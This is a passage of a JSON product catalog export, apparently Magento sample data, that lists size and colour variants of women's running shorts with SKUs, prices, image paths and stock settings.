:\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh09-gray_alt1.jpg,\\/w\\/s\\/wsh09-gray_back.jpg\",\"image\":\"\\/w\\/s\\/wsh09-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh09-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh09-gray_alt1.jpg,\\/w\\/s\\/wsh09-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Gray\"},\"1958\":{\"sku\":\"WSH09-28-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Mimi All-Purpose Short-28-Green\",\"description\":\"<p>You can run, bike or swim in the do-anything, water-resistance Mimi Short. No need to worry about rubbing-induced soreness either, with flatlock seams and soft, chafe-resistant material.<\\/p>\\n<p>&bull; Gray\\/seafoam two-layer shorts.<br \\/>&bull; Water-resistant construction.<br \\/>&bull; Inner mesh brief for breathable support.<br \\/>&bull; 2.0\\\" inseam.<br \\/>&bull; Reflective trim for visibility.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"44\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mimi-all-purpose-short-28-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh09-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh09-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh09-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh09-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh09-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Green\"},\"1959\":{\"sku\":\"WSH09-28-White\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Mimi All-Purpose Short-28-White\",\"description\":\"<p>You can run, bike or swim in the do-anything, water-resistance Mimi Short. No need to worry about rubbing-induced soreness either, with flatlock seams and soft, chafe-resistant material.<\\/p>\\n<p>&bull; Gray\\/seafoam two-layer shorts.<br \\/>&bull; Water-resistant construction.<br \\/>&bull; Inner mesh brief for breathable support.<br \\/>&bull; 2.0\\\" inseam.<br \\/>&bull; Reflective trim for visibility.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"44\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mimi-all-purpose-short-28-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh09-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh09-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh09-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh09-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh09-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"White\"},\"1960\":{\"sku\":\"WSH09-29-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Mimi All-Purpose Short-29-Gray\",\"description\":\"<p>You can run, bike or swim in the do-anything, water-resistance Mimi Short. No need to worry about rubbing-induced soreness either, with flatlock seams and soft, chafe-resistant material.<\\/p>\\n<p>&bull; Gray\\/seafoam two-layer shorts.<br \\/>&bull; Water-resistant construction.<br \\/>&bull; Inner mesh brief for breathable support.<br \\/>&bull; 2.0\\\" inseam.<br \\/>&bull; Reflective trim for visibility.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"44\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mimi-all-purpose-short-29-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh09-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh09-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh09-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh09-gray_alt1.jpg,\\/w\\/s\\/wsh09-gray_back.jpg\",\"image\":\"\\/w\\/s\\/wsh09-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh09-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh09-gray_alt1.jpg,\\/w\\/s\\/wsh09-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Gray\"},\"1961\":{\"sku\":\"WSH09-29-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Mimi All-Purpose Short-29-Green\",\"description\":\"<p>You can run, bike or swim in the do-anything, water-resistance Mimi Short. No need to worry about rubbing-induced soreness either, with flatlock seams and soft, chafe-resistant material.<\\/p>\\n<p>&bull; Gray\\/seafoam two-layer shorts.<br \\/>&bull; Water-resistant construction.<br \\/>&bull; Inner mesh brief for breathable support.<br \\/>&bull; 2.0\\\" inseam.<br \\/>&bull; Reflective trim for visibility.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"44\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mimi-all-purpose-short-29-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh09-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh09-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh09-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh09-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh09-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Green\"},\"1962\":{\"sku\":\"WSH09-29-White\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Mimi All-Purpose Short-29-White\",\"description\":\"<p>You can run, bike or swim in the do-anything, water-resistance Mimi Short. No need to worry about rubbing-induced soreness either, with flatlock seams and soft, chafe-resistant material.<\\/p>\\n<p>&bull; Gray\\/seafoam two-layer shorts.<br \\/>&bull; Water-resistant construction.<br \\/>&bull; Inner mesh brief for breathable support.<br \\/>&bull; 2.0\\\" inseam.<br \\/>&bull; Reflective trim for visibility.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"44\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mimi-all-purpose-short-29-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh09-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh09-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh09-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh09-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh09-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"White\"},\"1963\":{\"sku\":\"WSH09\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Mimi All-Purpose Short\",\"description\":\"<p>You can run, bike or swim in the do-anything, water-resistance Mimi Short. No need to worry about rubbing-induced soreness either, with flatlock seams and soft, chafe-resistant material.<\\/p>\\n<p>&bull; Gray\\/seafoam two-layer shorts.<br \\/>&bull; Water-resistant construction.<br \\/>&bull; Inner mesh brief for breathable support.<br \\/>&bull; 2.0\\\" inseam.<br \\/>&bull; Reflective trim for visibility.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"44\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh09-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh09-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh09-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_bottom=Basic,material=Nylon|Organic Cotton|Polyester,pattern=Solid-Highlight,climate=Mild|Warm,eco_collection=No,performance_fabric=No,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WSH09-28-Gray,size=28,color=Gray|sku=WSH09-28-Green,size=28,color=Green|sku=WSH09-28-White,size=28,color=White|sku=WSH09-29-Gray,size=29,color=Gray|sku=WSH09-29-Green,size=29,color=Green|sku=WSH09-29-White,size=29,color=White\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh09-gray_alt1.jpg,\\/w\\/s\\/wsh09-gray_back.jpg\",\"image\":\"\\/w\\/s\\/wsh09-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh09-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh09-gray_alt1.jpg,\\/w\\/s\\/wsh09-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_bottom\":\"Basic\",\"material\":\"Nylon|Organic Cotton|Polyester\",\"pattern\":\"Solid-Highlight\",\"climate\":\"Mild|Warm\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"1964\":{\"sku\":\"WSH10-28-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Ana Running Short-28-Black\",\"description\":\"<p>Time to lace up your kicks and beat that personal best in the Ana Running Short. It\'s designed with breathable mesh side panels to help keep you cool while you master the miles.<\\/p>\\n<p>&bull; Black\\/pink two-layer shorts.<br \\/>&bull; Low-rise elastic waistband.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Ultra-lightweight fabric. <br \\/>&bull; Internal drawstring. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"40\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ana-running-short-28-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh10-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh10-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh10-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh10-black_alt1.jpg,\\/w\\/s\\/wsh10-black_back.jpg\",\"image\":\"\\/w\\/s\\/wsh10-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh10-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh10-black_alt1.jpg,\\/w\\/s\\/wsh10-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Black\"},\"1965\":{\"sku\":\"WSH10-28-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Ana Running Short-28-Orange\",\"description\":\"<p>Time to lace up your kicks and beat that personal best in the Ana Running Short. It\'s designed with breathable mesh side panels to help keep you cool while you master the miles.<\\/p>\\n<p>&bull; Black\\/pink two-layer shorts.<br \\/>&bull; Low-rise elastic waistband.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Ultra-lightweight fabric. <br \\/>&bull; Internal drawstring. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"40\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ana-running-short-28-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh10-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh10-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh10-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh10-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh10-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Orange\"},\"1966\":{\"sku\":\"WSH10-28-White\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Ana Running Short-28-White\",\"description\":\"<p>Time to lace up your kicks and beat that personal best in the Ana Running Short. It\'s designed with breathable mesh side panels to help keep you cool while you master the miles.<\\/p>\\n<p>&bull; Black\\/pink two-layer shorts.<br \\/>&bull; Low-rise elastic waistband.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Ultra-lightweight fabric. <br \\/>&bull; Internal drawstring. <br \\/>&bull; Machine 